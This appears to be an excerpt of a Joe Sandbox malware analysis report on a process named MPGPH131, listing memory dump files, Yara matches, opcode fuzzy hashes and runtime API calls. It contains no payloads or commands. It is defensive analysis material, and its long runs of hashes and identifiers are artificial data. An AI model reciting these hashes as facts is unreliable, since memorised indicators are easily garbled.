                                    • Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: cfef15cc2ffaa8193a867a0f04385adf867c6a99382d79fb73d2117f0302d6ac
                                    • Instruction ID: a249e13fff9925cb58b0c7839961e9fc549ff2c3a268edac4d16ef7eea473c66
                                    • Opcode Fuzzy Hash: cfef15cc2ffaa8193a867a0f04385adf867c6a99382d79fb73d2117f0302d6ac
                                    • Instruction Fuzzy Hash: A8F0E931605135679B326B717805B9F774EBF81360B17C511FC0896098DB78EE0886E0
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,0090E0EB,?,?,?,?,?,00832D8D,0090B16C,?,?,0090B16C), ref: 009248D0
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: da0bc919526d4f87da7a66c8000839d6befd30f46a856a193391caf02e35c624
                                    • Instruction ID: 165b2fea8b796bf76ac9b7ef40a3b5b52bc0e6afde2698107032f618ebf9328d
                                    • Opcode Fuzzy Hash: da0bc919526d4f87da7a66c8000839d6befd30f46a856a193391caf02e35c624
                                    • Instruction Fuzzy Hash: 3CE06D312666B5A7EA213775BC05BAB764DCF827A0F160631AC58A6098DBA0DC5092E2
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3930783897.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_54d0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f222f0ba1469530daf5f80b2b744bfeeab51c58b99033a37432ac1be116e86c2
                                    • Instruction ID: 88851145b37385d3e8c837b69b471bba5a2a0c86986bbd265fbc65040deb8d42
                                    • Opcode Fuzzy Hash: f222f0ba1469530daf5f80b2b744bfeeab51c58b99033a37432ac1be116e86c2
                                    • Instruction Fuzzy Hash: D021EDEB2491107E7141D1966B3CEFBAB6EE5C6730B30C827F80AD6506F2984E5E6131
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3930783897.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_54d0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 90f62637bce695ea3b8318b0f67c4d15f4269f8fcd3e8c305fb955911eaa4ef1
                                    • Instruction ID: 1b5934a5187776537158ba23280d36117cb2e1a65a96e66a2914602dbe225096
                                    • Opcode Fuzzy Hash: 90f62637bce695ea3b8318b0f67c4d15f4269f8fcd3e8c305fb955911eaa4ef1
                                    • Instruction Fuzzy Hash: CB21EEEB2491117E7141D1966F2CEFBA76EE5C6730B30C82BF80AD6502F2944E5E6171
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3930783897.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_54d0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 660e2fbb3c33ddde3f42b1f78bac7562ec75d06d88ba05fcd8a713a049cefd05
                                    • Instruction ID: 526f1adaa44fe5b4b08748c33eee08dfc5b80880f056fe58e3220f7d57064af1
                                    • Opcode Fuzzy Hash: 660e2fbb3c33ddde3f42b1f78bac7562ec75d06d88ba05fcd8a713a049cefd05
                                    • Instruction Fuzzy Hash: 6411FBEB24D1117D7141D1966B2CEFBA76ED0C6B70B70C82BF80AD6501F2944E5A6171
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3930783897.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_54d0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f8438ae99343e8859bbe84a57da187130476eef83e494be959594f0b23e86d87
                                    • Instruction ID: 651623d3316563adb7ee779e91ccc91d472be4ab453381d9bc41318965338778
                                    • Opcode Fuzzy Hash: f8438ae99343e8859bbe84a57da187130476eef83e494be959594f0b23e86d87
                                    • Instruction Fuzzy Hash: FA11FBEB14D1117E7141C1967B3CEFBAB6ED0C6730B30C82BF84AD6502E2984E5E6132
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3930783897.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_54d0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 617561fc9fba5f4167fe3df2071b84177e062812707b3a8629b80a634893434d
                                    • Instruction ID: 6f710255a3cfaa454231598ab910bf1620bc37206061da490e231cb905438aab
                                    • Opcode Fuzzy Hash: 617561fc9fba5f4167fe3df2071b84177e062812707b3a8629b80a634893434d
                                    • Instruction Fuzzy Hash: FD0129EB14D014BD7141D1967B3CEFBAB6ED1C6730B70C86BF80AD6502F2984A9A6131
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3930783897.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_54d0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0c0ab5b6a9fa6905429b819e6e87ceb40e75fb80c610a59d79f9f6fd23f7d389
                                    • Instruction ID: 69585492a9402187302d73cae3d280dee3c91bd820786a304d555b682213f55d
                                    • Opcode Fuzzy Hash: 0c0ab5b6a9fa6905429b819e6e87ceb40e75fb80c610a59d79f9f6fd23f7d389
                                    • Instruction Fuzzy Hash: EE015AEB10D110BD7151D1923B7CEFB9BAEE0D5631B70C82BF80ADA502F1894A9F6132
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3930783897.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_54d0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6f2e80e48c5ae89b995dfab39fbe490bac8cd417f8b794966fc03900598fa1a4
                                    • Instruction ID: e67cb3a298ef2f541e4c9d1fabb7cb75eaca0c87043aad03b17b26d77da32768
                                    • Opcode Fuzzy Hash: 6f2e80e48c5ae89b995dfab39fbe490bac8cd417f8b794966fc03900598fa1a4
                                    • Instruction Fuzzy Hash: 47F0A4AB24D020AD7141D1923B38EFB975ED0C5730B70C82BF80BD6506E6884B9E6135
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3930783897.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_54d0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b4a53306d81a32d9129d3bb6f786ce756453191e9e32734168529e82cd92f122
                                    • Instruction ID: 87e80217f322ad25e0938982204a6db8132f94e9c5026c474659d505543ea520
                                    • Opcode Fuzzy Hash: b4a53306d81a32d9129d3bb6f786ce756453191e9e32734168529e82cd92f122
                                    • Instruction Fuzzy Hash: 5FF06DBB24C1216D7241D1923B78EFBA7AEE1C1730B70C82BF80BD2405E2490A9E6131
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3930783897.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_54d0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f0d73f3ed1cdd2845112cd83d46e8873a85cc6a49a70a3c266af03a6d84f876b
                                    • Instruction ID: 208a8eccc50efea9d7cff187de8f9ca99b5fdde5235ba717c3606edb00f3a6b2
                                    • Opcode Fuzzy Hash: f0d73f3ed1cdd2845112cd83d46e8873a85cc6a49a70a3c266af03a6d84f876b
                                    • Instruction Fuzzy Hash: A1E0E5AB149010AC7181D1922B2CEFB926EE1C5B31BB0C82BF80BD6402E6484B9E7132
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3930783897.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_54d0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 48dd7c83bbf7b92d13c6ce5f47aa93d077cb21ee02ea3c9e957c88cc007e1020
                                    • Instruction ID: c39e4becb73f0d495e5f553ec507e0d535ed259aefbd84572a66311fa8cf3a54
                                    • Opcode Fuzzy Hash: 48dd7c83bbf7b92d13c6ce5f47aa93d077cb21ee02ea3c9e957c88cc007e1020
                                    • Instruction Fuzzy Hash: C9E0B6EB15D024BC7191D5923B2CEFB936EE1D5B317B0C82BF80BD6405E6584A9EB132
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0089AEB3
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0089AED5
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0089AEF5
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0089AF1F
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0089AF8D
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0089AFD9
                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0089AFF3
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0089B088
                                    • std::_Facet_Register.LIBCPMT ref: 0089B095
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
                                    • String ID: bad locale name
                                    • API String ID: 3375549084-1405518554
                                    • Opcode ID: 13cdfc13f8dc3e13eccd5ab674a8e27c12ef273b4f4a63898987ee7d0ecffb3b
                                    • Instruction ID: 3633ffd5ebbd686a1bcb5cbae962c08b07d5a8eac1d4d1752c1f9b410a1c8588
                                    • Opcode Fuzzy Hash: 13cdfc13f8dc3e13eccd5ab674a8e27c12ef273b4f4a63898987ee7d0ecffb3b
                                    • Instruction Fuzzy Hash: 32618FB1D002489FDF25EFA4D885B9EBBB4FF54310F184068E815E7281EB74E909CB92
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 008337E9
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00833835
                                    • __Getctype.LIBCPMT ref: 0083384E
                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0083386A
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 008338FF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                    • String ID: bad locale name
                                    • API String ID: 1840309910-1405518554
                                    • Opcode ID: e84289729bb3bdd6524ee65538d88bf8bec3f3756b8fce8b8b9e0a9a7181fd0b
                                    • Instruction ID: 3e1d8eba16de450203cf0a7c27a5c6d14f9aec52586b4c12fef91d7e31af422b
                                    • Opcode Fuzzy Hash: e84289729bb3bdd6524ee65538d88bf8bec3f3756b8fce8b8b9e0a9a7181fd0b
                                    • Instruction Fuzzy Hash: FC515EF1D00248DBDB10DFA8D88579EFBB8AF54314F144569EC18AB281E775AA48CB92
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 009108B7
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 009108BF
                                    • _ValidateLocalCookies.LIBCMT ref: 00910948
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00910973
                                    • _ValidateLocalCookies.LIBCMT ref: 009109C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: cea4b8c3a9620023e79b984a71b0f658434c391d8c635098c65f21254115b33f
                                    • Instruction ID: 779e5196270de1f02ee3f05951ae80f98a6e88a540b8e97ec691e262857a04e7
                                    • Opcode Fuzzy Hash: cea4b8c3a9620023e79b984a71b0f658434c391d8c635098c65f21254115b33f
                                    • Instruction Fuzzy Hash: D841B234B0020DABDF10DF68C890BEE7BA9AF84324F148055E9189B352D776EAC5CB91
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00899543
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00899566
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00899586
                                    • std::_Facet_Register.LIBCPMT ref: 008995FB
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00899613
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0089962B
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: 6c4163b1aff48035ea12062372814cc25d1ba616feb6ed2e1b83dc473e44c94a
                                    • Instruction ID: eb44711276c718821d91ad609700a5d3161983fa001d2db6998e0bf7a11bd024
                                    • Opcode Fuzzy Hash: 6c4163b1aff48035ea12062372814cc25d1ba616feb6ed2e1b83dc473e44c94a
                                    • Instruction Fuzzy Hash: B841C0719042199FCF12EF58D841BAEBBB4FB41314F1A421DE895AB391DB70AD00CBD1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008360F2
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0083617F
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00836248
                                    Strings
                                    • recursive_directory_iterator::operator++, xrefs: 008361CC
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy$___std_exception_copy
                                    • String ID: recursive_directory_iterator::operator++
                                    • API String ID: 1206660477-953255998
                                    • Opcode ID: 9e433ea44860e8704a97427bcb84d8f37d95a4bc1855ddc215f456440b9e67d0
                                    • Instruction ID: 6abc2432ae1aa8394e4f1908dde132cecd307a0d681bc790e2a7d9b386dd8c65
                                    • Opcode Fuzzy Hash: 9e433ea44860e8704a97427bcb84d8f37d95a4bc1855ddc215f456440b9e67d0
                                    • Instruction Fuzzy Hash: CEE1E2B19006089FCB28DF68D845B9EB7F9FF84700F14861DE456E7781EB74AA44CBA1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008386DE
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008386ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: at line $, column
